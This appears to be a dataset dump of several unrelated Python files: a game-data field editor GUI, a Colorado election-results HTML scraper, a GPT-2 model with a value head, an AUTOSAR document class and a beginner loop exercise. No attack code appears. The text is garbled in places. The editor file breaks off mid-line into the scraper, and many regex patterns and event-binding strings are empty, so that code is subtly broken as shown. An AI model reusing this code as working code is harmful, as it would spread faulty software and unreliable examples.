BaseFieldEditor, row_index: int, main_bindings: dict = None):\n self.master = editor\n self.STYLE_DEFAULTS = editor.STYLE_DEFAULTS\n\n self.row_index = row_index\n self._active = False\n self._link_missing = False\n self.field_name = \"\"\n self.field_type = type # type: FieldTypeTyping\n self.field_nickname = \"\"\n self.field_docstring = \"\"\n self.field_links = []\n self.link_missing = False\n\n bg_color = self._get_color()\n\n self.row_box = editor.Frame(\n width=editor.FIELD_BOX_WIDTH,\n height=editor.FIELD_ROW_HEIGHT,\n bg=bg_color,\n row=row_index,\n columnspan=2,\n sticky=\"nsew\",\n )\n bind_events(self.row_box, main_bindings)\n\n self.field_name_box = editor.Frame(row=row_index, column=0, bg=bg_color, sticky=\"w\")\n bind_events(self.field_name_box, main_bindings)\n\n self.field_name_label = editor.Label(\n self.field_name_box,\n text=\"\",\n fg=editor.FIELD_NAME_FG,\n width=editor.FIELD_NAME_WIDTH,\n bg=bg_color,\n anchor=\"w\",\n font_size=10,\n )\n bind_events(self.field_name_label, main_bindings)\n\n self.value_box = editor.Frame(\n width=editor.FIELD_VALUE_BOX_WIDTH, row=row_index, column=1, bg=bg_color, sticky=\"ew\"\n )\n bind_events(self.value_box, main_bindings)\n\n # VALUE WIDGETS\n\n self.value_label = editor.Label(\n self.value_box, text=\"\", bg=bg_color, width=editor.FIELD_VALUE_WIDTH, anchor=\"w\"\n )\n bind_events(self.value_label, main_bindings)\n\n self.value_checkbutton = editor.Checkbutton(\n self.value_box,\n label=None,\n bg=bg_color,\n no_grid=True,\n selectcolor=\"#000\",\n command=self._checkbutton_toggle,\n )\n # Main focus bindings are not bound to Checkbutton.\n\n self.value_combobox = editor.Combobox(\n self.value_box,\n values=None,\n width=editor.FIELD_VALUE_WIDTH,\n no_grid=True,\n font=(\"Segoe UI\", 10),\n on_select_function=self._combobox_choice,\n )\n self.value_combobox.bind(\"\", lambda _: \"break\") # prevent scrolling on collapsed Combobox\n # Main focus bindings are not bound to Combobox.\n\n # TODO: BEHAVIOR_REF_TYPE combobox should also force a refresh, as it may change field names.\n # (Class will need access to ParamEntry for this, which is fine.)\n\n self.context_menu = editor.Menu(self.row_box)\n self.tool_tip = ToolTip(self.row_box, self.field_name_box, self.field_name_label, text=None)\n\n self.active_value_widget = self.value_label\n self.hide()\n\n def _combobox_choice(self, _=None):\n \"\"\"Updates field value with integer value from Combobox enum or unknown integer.\n\n Note that the Combobox's appearance needs no further updating.\n \"\"\"\n combobox_string = self.value_combobox.var.get()\n if combobox_string.startswith(\"Unknown: \"):\n value = int(combobox_string[len(\"Unknown: \"):])\n else:\n value = int(self.value_combobox.var.get().split(\" \")[0])\n self.master.change_field_value(self.field_name, value)\n\n def _activate_value_widget(self, widget):\n if id(self.active_value_widget) != id(widget):\n self.active_value_widget.grid_remove()\n self.active_value_widget = widget\n\n def _checkbutton_toggle(self):\n \"\"\"Modify appearance of Checkbutton when toggled.\"\"\"\n new_value = self.value_checkbutton.var.get()\n if self.master.change_field_value(self.field_name, new_value):\n self.value_checkbutton.config(fg=\"#3F3\" if new_value else \"#F33\", text=\"ON\" if new_value else \"OFF\")\n else:\n self.value_checkbutton.var.set(not new_value)\n\n def update_field(\n self,\n name,\n nickname,\n value: tp.Any,\n field_type: type,\n docstring=\"\",\n ):\n \"\"\"Update widgets with given field information.\n\n The `entry` argument is not used by this base class, but may be used by child methods.\n \"\"\"\n self.field_name = name\n self.field_type = field_type\n self.field_nickname = camel_case_to_spaces(nickname) if self.CAMEL_CASE_NICKNAMES else nickname\n self.field_docstring = docstring if docstring else \"DOC-TODO\"\n self.field_links = []\n\n if self.field_name_label.var.get() != self.field_nickname:\n self.field_name_label.var.set(self.field_nickname)\n\n self.update_field_value_display(value)\n\n self.tool_tip.text = self.field_docstring\n self.unhide()\n\n def _update_field_GameObjectSequence(self, value):\n if self.field_type.count != len(value):\n raise ValueError(\n f\"Length of value {value} does not match number of objects in `GameObjectSequence` for field \"\n f\"{self.field_name}.\"\n )\n self.field_links = []\n for value_i in value:\n if value_i is not None:\n self.field_links += self.master.get_field_links(self.field_type.game_object_type, value_i)\n valid_count = sum(v is not None for v in value)\n self._set_linked_value_label(f\"<{valid_count} entries>\", multiple_hint=\"{MULTIPLE}\")\n\n def _update_field_GameObject(self, value):\n self.field_links = self.master.get_field_links(self.field_type, value)\n self._update_field_int(value)\n\n def _update_field_IntEnum(self, value):\n self.value_combobox[\"values\"] = [f\"{e.value} {camel_case_to_spaces(e.name)}\" for e in self.field_type]\n try:\n enum_name = getattr(self.field_type(value), \"name\")\n except ValueError:\n value_text = f\"Unknown: {value}\"\n else:\n value_text = f\"{value} {camel_case_to_spaces(enum_name)}\"\n self.value_combobox.var.set(value_text)\n self._activate_value_widget(self.value_combobox)\n\n def _update_field_int(self, value):\n self._set_linked_value_label(str(value))\n\n def _update_field_float(self, value):\n self._set_linked_value_label(f\"{value:.3f}\")\n\n def _update_field_bool(self, value):\n if value not in {0, 1}:\n raise ValueError(f\"Field with 'bool' type has non-boolean value: {value}\")\n self.value_checkbutton.var.set(value)\n self.value_checkbutton.config(fg=\"#3F3\" if value else \"#F33\", text=\"ON\" if value else \"OFF\")\n self._activate_value_widget(self.value_checkbutton)\n\n def _update_field_list(self, value):\n \"\"\"Actual list of values (e.g. draw groups).\"\"\"\n # Convert sets (e.g. draw/display/navmesh groups) to sorted lists so empty sets appear pretty.\n value_text = repr(sorted(value)) if not isinstance(value, list) else repr(value)\n self.value_label.var.set(value_text)\n self._activate_value_widget(self.value_label)\n\n @property\n def field_update_method(self) -> tp.Callable:\n \"\"\"Returns the appropriate update method for the current field type.\"\"\"\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_update_field_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return self._set_linked_value_label\n if issubclass(self.field_type, GameObjectSequence):\n return self._update_field_GameObjectSequence\n if issubclass(self.field_type, BaseGameObject):\n return self._update_field_GameObject\n if issubclass(self.field_type, IntEnum):\n return self._update_field_IntEnum\n\n raise AttributeError(f\"Could not find field update method '_update_field_{field_type_name}' or a superclass.\")\n\n def _set_linked_value_label(self, value_text, multiple_hint=\"{AMBIGUOUS}\"):\n if self.field_links:\n if len(self.field_links) > 1:\n value_text += f\" {multiple_hint}\"\n if any(link.name is None for link in self.field_links):\n value_text += \" {BROKEN LINK}\"\n else:\n value_text += f\" {{{self.field_links[0].name}}}\"\n if self.value_label.var.get() != value_text:\n self.value_label.var.set(value_text) # TODO: probably redundant in terms of update efficiency\n self._activate_value_widget(self.value_label)\n\n def _set_field_fg(self, value):\n \"\"\"Color field text ('fg') depending on whether value is some default that shouldn't draw attention.\"\"\"\n if self._is_default(self.field_type, value, self.field_nickname):\n self.field_name_label[\"fg\"] = self.master.FIELD_NAME_FG_DEFAULT\n self.value_label[\"fg\"] = self.master.FIELD_VALUE_FG_DEFAULT\n else:\n self.field_name_label[\"fg\"] = self.master.FIELD_NAME_FG\n self.value_label[\"fg\"] = self.master.FIELD_VALUE_FG\n\n def hide(self):\n \"\"\"Called when this row has no field to display (e.g. for smaller ParamTables or unselected entry).\"\"\"\n self.row_box.grid_remove()\n self.field_name_box.grid_remove()\n self.field_name_label.grid_remove()\n self.value_box.grid_remove()\n self.active_value_widget.grid_remove()\n\n def unhide(self):\n self.row_box.grid()\n self.field_name_box.grid()\n self.field_name_label.grid()\n self.value_box.grid()\n self.active_value_widget.grid()\n\n def build_field_context_menu(self):\n self.context_menu.delete(0, \"end\")\n\n if self.field_links:\n for field_link in self.field_links:\n field_link.add_to_context_menu(self.context_menu)\n\n # Users can enter their own custom integer values for IntEnums.\n if issubclass(self.field_type, IntEnum):\n self.context_menu.add_command(label=\"Set custom integer value\", command=self._set_custom_intenum_value)\n\n @property\n def editable(self):\n return self.active_value_widget is self.value_label\n\n def _string_to_GameObjectSequence(self, string):\n try:\n new_value = literal_eval(string)\n if isinstance(new_value, tuple):\n new_value = list(new_value)\n elif not isinstance(new_value, list):\n raise SyntaxError\n except SyntaxError:\n raise ValueError(f\"Value of field {self.field_nickname} should be a list of strings or numbers.\")\n game_object_type = self.field_type.game_object_type\n for new_value_i in new_value:\n if new_value_i is None:\n continue # None is valid for any type.\n if issubclass(game_object_type, BaseParam) and not isinstance(new_value_i, int):\n raise ValueError(f\"Found non-integer {game_object_type} value in sequence: {new_value_i}\")\n elif issubclass(game_object_type, MapEntry) and not isinstance(new_value_i, str):\n raise ValueError(f\"Found non-string {game_object_type} name in sequence: {new_value_i}\")\n return new_value\n\n def _string_to_GameObject(self, string):\n # Assume all non-`MapEntry` fields use integers (e.g. `BaseParam`, `Text`).\n if issubclass(self.field_type, MapEntry):\n return string\n else:\n try:\n return int(string)\n except ValueError:\n raise InvalidFieldValueError(\n f\"Value of field {self.field_nickname} must be an integer ({self.field_type}).\"\n )\n\n def _string_to_int(self, string):\n if not string.strip(\"-\"):\n return None # no change\n try:\n return int(string)\n except ValueError:\n raise InvalidFieldValueError(f\"Value of field {self.field_nickname} must be an integer.\")\n\n def _string_to_float(self, string):\n if not string.strip(\"-\"):\n return None # no change\n try:\n return float(string)\n except ValueError:\n raise InvalidFieldValueError(f\"Value of field {self.field_nickname} must be a float.\")\n\n def _string_to_list(self, string):\n \"\"\"At the moment, all elements of `list`-type fields must be integers.\"\"\"\n try:\n new_value = literal_eval(string)\n if isinstance(new_value, tuple):\n new_value = list(new_value)\n elif not isinstance(new_value, list):\n raise SyntaxError\n if not all(isinstance(i, int) for i in new_value):\n raise SyntaxError\n except (SyntaxError, ValueError):\n raise InvalidFieldValueError(\n f\"Value of field {self.field_nickname} must be a list of integers, e.g. [1, 2, 3, ...]\"\n )\n return new_value\n\n @property\n def string_conversion_method(self) -> tp.Callable:\n \"\"\"Returns the appropriate update method for the current field type.\"\"\"\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_string_to_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return lambda value: value\n if issubclass(self.field_type, GameObjectSequence):\n return self._string_to_GameObjectSequence\n if issubclass(self.field_type, BaseGameObject):\n return self._string_to_GameObject\n if issubclass(self.field_type, IntEnum):\n raise NotImplementedError\n\n raise AttributeError(f\"Could not find field update method '_string_to_{field_type_name}' or a superclass.\")\n\n def update_field_value_display(self, new_value):\n \"\"\"Updates field value and display/option properties related to it.\"\"\"\n self.field_update_method(new_value)\n self._set_field_fg(new_value)\n self.link_missing = self.field_links and not any(link.name for link in self.field_links)\n self.build_field_context_menu()\n\n @property\n def active(self):\n return self._active\n\n @active.setter\n def active(self, value: bool):\n if not self._active and value:\n self._active = True\n elif self._active and not value:\n self._active = False\n else:\n return # No change to active state.\n\n # All widget backgrounds need updating (except Combobox).\n self._update_colors()\n\n @property\n def link_missing(self):\n return self._link_missing\n\n @link_missing.setter\n def link_missing(self, value: bool):\n if value and not self._link_missing:\n self._link_missing = True\n self._update_colors()\n elif not value and self._link_missing:\n self._link_missing = False\n self._update_colors()\n\n def _update_colors(self):\n bg_color = self._get_color()\n for widget in (\n self.row_box,\n self.field_name_box,\n self.field_name_label,\n self.value_box,\n self.value_label,\n self.value_checkbutton,\n ):\n widget[\"bg\"] = bg_color\n\n def _get_color(self):\n \"\"\"Inspects field name/data and returns an RGB string.\"\"\"\n base_bg = int(self.STYLE_DEFAULTS[\"bg\"].lstrip(\"#\")) # dark grey\n if self.link_missing:\n base_bg += 100\n if self._active:\n base_bg += 123\n if self.row_index % 2:\n base_bg += 111\n return f\"#{base_bg}\"\n\n def _set_custom_intenum_value(self):\n new_value = NumberEditBox(\n self.master, window_title=f\"New value for {self.field_nickname}\", integers_only=True,\n ).go()\n if new_value is None:\n return\n field_changed = self.master.change_field_value(self.field_name, new_value)\n if field_changed:\n self.update_field_value_display(new_value)\n\n def _is_default(self, field_type, value, field_nickname=\"\"):\n return False\n\n\nclass BaseFieldEditor(BaseEditor, abc.ABC):\n FIELD_CANVAS_BG = \"#1d1d1d\"\n FIELD_BOX_WIDTH = 450\n FIELD_BOX_HEIGHT = 400\n FIELD_ROW_HEIGHT = 30\n FIELD_NAME_WIDTH = 30\n FIELD_VALUE_BOX_WIDTH = 200\n FIELD_VALUE_WIDTH = 50\n FIELD_ROW_COUNT = 0 # must be set in child\n FIELD_NAME_FG = \"#DDE\"\n FIELD_NAME_FG_DEFAULT = \"#777\"\n FIELD_VALUE_FG = \"#FFF\"\n FIELD_VALUE_FG_DEFAULT = \"#777\"\n\n FIELD_ROW_CLASS = FieldRow\n field_rows: list[FieldRow]\n\n def __init__(\n self,\n project: GameDirectoryProject,\n linker: WindowLinker,\n master=None,\n toplevel=False,\n window_title=\"Soulstruct Editor\",\n ):\n if self.FIELD_ROW_COUNT == 0:\n raise AttributeError(\"Class attribute `FIELD_ROW_COUNT` must be set by child of SoulstructBaseFieldEditor.\")\n self.show_hidden_fields = None\n self.field_canvas = None\n self.field_i_frame = None\n self.e_field_value_edit = None\n self.selected_field_row_index = None\n self.displayed_field_count = 0\n self.field_rows = []\n super().__init__(project=project, linker=linker, master=master, toplevel=toplevel, window_title=window_title)\n\n def build(self):\n \"\"\"Builds category, entry, and field tables.\"\"\"\n with self.set_master(sticky=\"nsew\", row_weights=[1], column_weights=[0, 1], auto_columns=0):\n self.build_category_canvas()\n with self.set_master(sticky=\"nsew\", row_weights=[0, 1, 0], column_weights=[1, 1]):\n self.build_previous_range_button(row=0, column=0)\n self.build_hidden_fields_checkbutton(row=0, column=1)\n with self.set_master(sticky=\"nsew\", row=1, column=0, row_weights=[1], column_weights=[1]):\n self.build_entry_frame()\n with self.set_master(sticky=\"nsew\", row=1, column=1, row_weights=[1], column_weights=[1]):\n self.build_field_frame()\n self.build_next_range_button(row=2, column=0)\n\n def build_hidden_fields_checkbutton(self, **kwargs):\n self.show_hidden_fields = self.Checkbutton(\n label=\"Show hidden fields\",\n initial_state=False,\n command=lambda: self.refresh_fields(reset_display=True),\n pady=10,\n **kwargs,\n ).var\n\n def build_field_frame(self):\n self.field_canvas = self.Canvas(\n yscrollincrement=self.FIELD_ROW_HEIGHT,\n vertical_scrollbar=True,\n horizontal_scrollbar=True,\n borderwidth=10,\n highlightthickness=0,\n bg=self.FIELD_CANVAS_BG,\n sticky=\"nsew\",\n row_weights=[1],\n column_weights=[1],\n )\n self.field_i_frame = self.Frame(frame=self.field_canvas, width=self.FIELD_BOX_WIDTH, sticky=\"nsew\")\n self.field_i_frame.bind(\"\", lambda e, c=self.field_canvas: self.reset_canvas_scroll_region(c))\n self.field_canvas.create_window(0, 0, window=self.field_i_frame, anchor=\"nw\")\n\n with self.set_master(self.field_i_frame):\n for row in range(self.FIELD_ROW_COUNT):\n self.field_rows.append(\n self.FIELD_ROW_CLASS(\n self,\n row_index=row,\n main_bindings={\n \"\": lambda _, i=row: self.select_displayed_field_row(i),\n \"\": lambda e, i=row: self._right_click_field(e, i),\n \"\": self._field_press_up,\n \"\": self._field_press_down,\n },\n )\n )\n\n def select_category(\n self, selected_category: tp.Optional[str], first_display_index=0, auto_scroll=False, view_change=False\n ):\n \"\"\"Updates `active_category` attribute and row colors.\n\n By default, resets `first_display_index` to zero.\n Supports 'selected_category=None' to deselect all categories.\n \"\"\"\n old_category = self.active_category\n\n if old_category is not None:\n selected_entry_id = self.get_entry_id(self.active_row_index) if self.active_row_index else None\n self.remembered_ids[old_category] = selected_entry_id\n\n if selected_category != self.active_category:\n self.active_category = selected_category\n for category, (box, label) in self.category_boxes.items():\n if selected_category == category:\n box[\"bg\"] = self.CATEGORY_SELECTED_BG\n label[\"bg\"] = self.CATEGORY_SELECTED_BG\n label.focus_set()\n else:\n box[\"bg\"] = self.CATEGORY_UNSELECTED_BG\n label[\"bg\"] = self.CATEGORY_UNSELECTED_BG\n\n if auto_scroll:\n view_ratio = list(self.category_boxes).index(self.active_category) / (len(self.category_boxes) + 1)\n self.category_canvas.yview_moveto(view_ratio)\n\n self.first_display_index = first_display_index\n self.select_entry_row_index(None, edit_if_already_selected=False)\n self.refresh_entries(reset_field_display=True) # TODO: this argument is the only difference. Better way?\n last_selected_entry_id = self.remembered_ids.get(self.active_category, None)\n if last_selected_entry_id is not None:\n try:\n self.select_entry_id(last_selected_entry_id, edit_if_already_selected=False)\n except ValueError:\n self.remembered_ids.pop(self.active_category) # entry ID is invalid\n self.entry_canvas.yview_moveto(0)\n else:\n # Leave no entry selected.\n self.entry_canvas.yview_moveto(0)\n\n if view_change and old_category is not None:\n self.view_history.record_view_change(\n back=lambda: self.select_category(old_category), forward=lambda: self.select_category(selected_category)\n )\n\n def refresh_entries(self, reset_field_display=False):\n super().refresh_entries()\n self.refresh_fields(reset_display=reset_field_display)\n\n def select_entry_row_index(\n self, row_index, set_focus_to_text=True, edit_if_already_selected=True, id_clicked=False, view_change=False\n ):\n super().select_entry_row_index(\n row_index,\n set_focus_to_text=set_focus_to_text,\n edit_if_already_selected=edit_if_already_selected,\n id_clicked=id_clicked,\n view_change=view_change,\n )\n self.refresh_fields()\n\n # `refresh_fields()` seems to steal focus aggressively, so end by setting it back to entry name.\n if row_index is not None and set_focus_to_text:\n self.entry_rows[row_index].text_label.focus_set()\n\n def refresh_fields(self, reset_display=False):\n \"\"\"Refresh all field information.\"\"\"\n field_dict = self.get_selected_field_dict()\n\n self._cancel_field_value_edit()\n\n show_hidden_fields = self.show_hidden_fields.get()\n\n row = 0\n for field_name in self.get_field_names(field_dict):\n\n try:\n field_nickname, is_main, field_type, field_doc = self.get_field_display_info(field_dict, field_name)\n except ValueError as e:\n raise ValueError(f\"Could not get field information for field {field_name}. Error: {str(e)}\")\n\n if isinstance(field_type, str) and (\"
    \n # \n # \n # \n # \n digits = r'(\\d{1,3}(,\\d{1,3})?)'\n pat = r'^$'.format(col_title=col_title, digits=digits)\n matches = re.match(pat, line)\n if matches:\n # Totals may have commas for thousands separator\n total = locale.atoi(matches.groups()[0])\n return total\n else:\n return None\n\n\ndef process_election_file(htmlfile, csvfile):\n fields = {'district': 0, 'counties': '', 'registered_voters': 0, 'ballots_cast': 0,\n 'democrat': 0, 'republican': 0, 'other': 0, 'total': 0, 'dem_winner': 0, 'rep_winner': 0,\n 'landslide_d': 0, 'landslide_r': 0}\n with open(htmlfile, 'r') as fp1, open(csvfile, 'w') as fp2:\n csvwriter = csv.DictWriter(fp2, fieldnames=fields.keys())\n csvwriter.writeheader()\n county_list = []\n total_found = False\n # print(\"district,counties,registered_voters,ballots_cast,democrat,republican,other,total,dem_winner,rep_winner,landslide_d, landslide_r\")\n\n for line in fp1.readlines():\n # District heading\n matches = re.match(r'^

    (?:State Senate - )?District (\\d+)

    $', line)\n if not matches:\n # Try 2014 pattern:\n matches = re.match(r'^

    District (\\d+)

    $', line)\n if matches:\n fields['district'] = int(matches.groups()[0])\n county_list = []\n continue\n\n # Total\n # \n matches = re.match(r'', line)\n if not matches:\n # Special case for 2012 District 13: \n # Also special case for 2014 District 47 and District 60 with HTML formatting inconsistency\n matches = re.match(r'', line)\n if matches:\n if matches.groups()[0] == 'Total':\n total_found = True\n else:\n county_list.append(matches.groups()[0])\n continue\n\n if not total_found:\n continue\n\n # Fix-up errors in HTML file\n if fields['district'] == 33 and 'Broomfield' in county_list and line == '\\n':\n # 2018 - District 33 - Broomfield\n line = '\\n'\n elif fields['district'] == 46 and 'Pueblo' in county_list and line == '\\n':\n # 2018 - Distict 46 - Pueblo\n line = '\\n'\n\n # Registered voters\n total = total_matcher(line, \"Registered voters\")\n if total and total_found:\n fields['registered_voters'] = total\n continue\n\n # Ballots cast\n total = total_matcher(line, \"Ballots cast\")\n if total:\n fields['ballots_cast'] = total\n continue\n\n # Other\n total = total_matcher(line, r'(?:.+)\\((?!(?:DEM|REP))\\w+\\)')\n if total:\n fields['other'] += total # Sum\n continue\n\n # 2014 write-in for District 60\n total = total_matcher(line, r'(?:.+)\\(UNA\\)(?: \\(Write-In\\))?')\n if total:\n fields['other'] += total # Sum because of write-in UNA\n continue\n\n # Democrat\n total = total_matcher(line, r'(?:.+)\\(DEM\\)(?: \\(Write-In\\))?')\n if total:\n fields['democrat'] += total # Sum because of write-in Democrat\n continue\n\n # Republican\n total = total_matcher(line, r'(?:.+)\\(REP\\)(?: \\(Write-In\\))?')\n if total:\n fields['republican'] += total # Sum because of write-in Republicans\n continue\n\n # Total\n total = total_matcher(line, \"Total\")\n if total:\n fields['total'] = total\n\n # Determine party that prevailed\n if fields['democrat'] > fields['republican'] and fields['democrat'] > fields['other']:\n fields['dem_winner'] = 1\n fields['rep_winner'] = 0\n elif fields['republican'] > fields['democrat'] and fields['republican'] > fields['other']:\n fields['dem_winner'] = 0\n fields['rep_winner'] = 1\n else:\n raise Exception(\"Election tie or other won!\")\n\n # Is this a landslide district?\n landslide_percentage = 0.6 # 60%\n if fields['dem_winner'] == 1:\n fields['landslide_d'] = int(fields['democrat'] / fields['total'] >= landslide_percentage)\n fields['landslide_r'] = 0\n elif fields['rep_winner']:\n fields['landslide_r'] = int(fields['republican'] / fields['total'] >= landslide_percentage)\n fields['landslide_d'] = 0\n else:\n raise Exception(\"No winner found!\")\n\n # Sanity check\n party_total = fields['democrat'] + fields['republican'] + fields['other']\n if party_total != fields['total']:\n raise Exception(f\"Total mismatch for district {fields['district']}: computed {party_total} != SOS {fields['total']}\")\n\n # Flatten county list\n fields['counties'] = ' - '.join(county_list)\n\n # Emit CSV row\n csvwriter.writerow(fields)\n\n # Reset totals\n fields['democrat'] = 0\n fields['republican'] = 0\n fields['other'] = 0\n total_found = False\n\n\nif __name__ == \"__main__\":\n locale.setlocale(locale.LC_ALL, 'en_US.UTF-8') # For parsing numbers with comma separators\n years = [2018, 2016, 2014, 2012]\n district_types = ['representatives', 'senate']\n for year in years:\n for district_type in district_types:\n if year == 2018 or year == 2016:\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2018/general/stateRepresentatives.html\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2016/general/stateRepresentatives.html\n htmlfile = './sos_files/state{district_type}.{year}.html'.format(district_type=district_type.title(), year=year)\n elif year == 2014 or year == 2012:\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2014/general/representatives.html\n # https://www.sos.state.co.us/pubs/elections/Results/Abstract/2012/general/representatives.html\n htmlfile = './sos_files/{district_type}.{year}.html'.format(district_type=district_type, year=year)\n else:\n raise Exception(f\"Invalid year: {year}\")\n csvfile = './election_data/{year}/state{district_type}.{year}.csv'.format(district_type=district_type.title(), year=year)\n print(f\"Processing {htmlfile}\")\n process_election_file(htmlfile, csvfile)\n print(f\"CSV written to {csvfile}\")\n","repo_name":"coloradocarlos/colorado_redistricting_2021","sub_path":"sos_screen_scraper.py","file_name":"sos_screen_scraper.py","file_ext":"py","file_size_in_byte":8799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20109587721","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Model, GPT2PreTrainedModel\nfrom transformers.modeling_utils import top_k_top_p_filtering\nfrom torch import nn\nfrom torch.nn import Identity\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\n\nclass ValueHead(nn.Module):\n \"\"\"The ValueHead class implements a head for GPT2 that returns a scalar for each output token.\"\"\"\n def __init__(self, config):\n super().__init__()\n self.detach_head = False\n self.summary_type = config.summary_type if hasattr(config, \"summary_type\") else \"last\"\n if self.summary_type == \"attn\":\n raise NotImplementedError\n self.summary = Identity()\n if hasattr(config, \"summary_use_proj\") and config.summary_use_proj:\n if hasattr(config, \"summary_proj_to_labels\") and config.summary_proj_to_labels and config.num_labels > 0:\n num_classes = config.num_labels\n else:\n num_classes = config.hidden_size\n self.summary = nn.Linear(config.hidden_size, num_classes)\n self.activation = Identity()\n if hasattr(config, \"summary_activation\") and config.summary_activation == \"tanh\":\n self.activation = nn.Tanh()\n self.first_dropout = Identity()\n if hasattr(config, \"summary_first_dropout\") and config.summary_first_dropout > 0:\n self.first_dropout = nn.Dropout(config.summary_first_dropout)\n self.last_dropout = Identity()\n if hasattr(config, \"summary_last_dropout\") and config.summary_last_dropout > 0:\n self.last_dropout = nn.Dropout(config.summary_last_dropout)\n self.flatten = nn.Flatten()\n\n def forward(self, hidden_states, cls_index=None):\n if self.detach_head:\n output = hidden_states.detach()\n else:\n output = hidden_states\n output = self.first_dropout(output)\n output = self.summary(output)\n output = self.activation(output)\n output = self.last_dropout(output)\n\n return output\n\n\nclass GPT2HeadWithValueModel(GPT2PreTrainedModel):\n \"\"\"The GPT2HeadWithValueModel class implements a GPT2 language model with a secondary, scalar head.\"\"\"\n def __init__(self, config):\n super().__init__(config)\n print(config)\n print('vocab_size shape :',config.vocab_size)\n config.num_labels = 1\n self.transformer = GPT2Model(config)\n self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)\n self.v_head = ValueHead(config)\n self.init_weights()\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def detach_value_head(self):\n self.v_head.detach_head = True\n\n def forward(\n self,\n input_ids=None,\n past=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n mc_token_ids=None,\n lm_labels=None,\n mc_labels=None,\n ):\n transformer_outputs = self.transformer(\n input_ids,\n past=past,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n )\n hidden_states = transformer_outputs[0]\n\n lm_logits = self.lm_head(hidden_states)\n value = self.v_head(hidden_states).squeeze(-1)\n\n outputs = (lm_logits,) + transformer_outputs[1:] + (value,)\n\n return outputs\n\n\n\ndef respond_to_batch(model, ref_model , queries, txt_len=20, top_k=0, top_p=1.0):\n \"\"\"Sample text from language model.\"\"\"\n input_ids = queries\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n with torch.no_grad(): \n for i in range(txt_len):\n outputs = model(input_ids)\n next_token_logits = outputs[0][:, -1, :]\n next_token_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)\n if ref_model is not None:\n ref_next_token_logits = ref_model(input_ids)[0][:, -1, :]\n ref_next_token_probs = ref_next_token_logits.softmax(dim=-1)\n next_token_logits[ref_next_token_probs < 0.01] = np.NINF#-inf\n probs = F.softmax(next_token_logits, dim=-1)\n next_token = torch.multinomial(probs, num_samples=1).squeeze(1)\n input_ids = torch.cat([input_ids, next_token.unsqueeze(-1)], dim=-1)\n return input_ids[:, -txt_len:]\n\n\n","repo_name":"HongliangLiang/gptfuzzer","sub_path":"Inference/gpt2.py","file_name":"gpt2.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"26894938239","text":"\n\"\"\"\nAUTOSAR Document\n\"\"\"\n\nfrom typing import Any\nimport autosar.xml.element as ar_element\n\n\nclass DocumentMeta:\n \"\"\"\n Helper class for holding information about XML schema\n \"\"\"\n\n def __init__(self, schema_version: int) -> None:\n self.schema_version = schema_version\n\n @property\n def schema_file(self) -> str:\n \"\"\"\n Converts schema version integer to expected schema file name\n \"\"\"\n return f'AUTOSAR_{self.schema_version:05d}.xsd'\n\n\nclass Document(DocumentMeta):\n \"\"\"\n Implements AUTOSAR root description element\n \"\"\"\n\n def __init__(self, packages: list[ar_element.Package] | None = None, schema_version=51) -> None:\n super().__init__(schema_version)\n self.file_info_comment = None # .FILE-INFO-COMMENT\n self.admin_data = None # .ADMIN-DATA\n self.introduction = None # .INTRODUCTION\n self.packages = [] # .PACKAGES\n self._package_map = {} # internal package map\n if packages is not None:\n for package in packages:\n self.append(package)\n\n def append(self, package: ar_element.Package):\n \"\"\"\n Appends package to this document and\n appropriately updates reference links\n \"\"\"\n if isinstance(package, ar_element.Package):\n if package.name in self._package_map:\n raise ValueError(\n f\"Package with SHORT-NAME '{package.name}' already exists\")\n package.parent = self\n self.packages.append(package)\n self._package_map[package.name] = package\n\n def find(self, ref: str) -> Any:\n \"\"\"\n Finds item by reference\n \"\"\"\n if ref.startswith('/'):\n ref = ref[1:]\n parts = ref.partition('/')\n package = self._package_map.get(parts[0], None)\n if (package is not None) and (len(parts[2]) > 0):\n return package.find(parts[2])\n return package\n\n def update_ref_parts(self, ref_parts: list[str]):\n \"\"\"\n Utility method used generating XML references\n \"\"\"\n ref_parts.append('')\n","repo_name":"cogu/autosar","sub_path":"src/autosar/xml/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"37"} +{"seq_id":"10448646765","text":"# Loops & Iterators\n#program for calc. count and avg of input values\ncount = 0\nsum = 0\ntry:\n while True:\n num = input(\"Enter a number: \")\n if num == \"done\":\n break\n sum += int(num)\n count += 1\n print(count,sum,sum/count)\nexcept ValueError : \n print('invalid entry')\n\n#program for largest and smallest values\nnumbers = []\ntry:\n while True:\n num = input('Enter the number:')\n numbers.append(int(num))\n if num == \"done\":\n break\nexcept ValueError:\n print(\"Process ended\")\nprint(numbers)\nnumbers.sort()\nprint(numbers)\nprint(f'largest number is {numbers[-1]}')\nprint(f'smallest number is {numbers[0]}')\n\n","repo_name":"revacprogramming/python01-ahp2808","sub_path":"ActivitySet01/problem06.py","file_name":"problem06.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 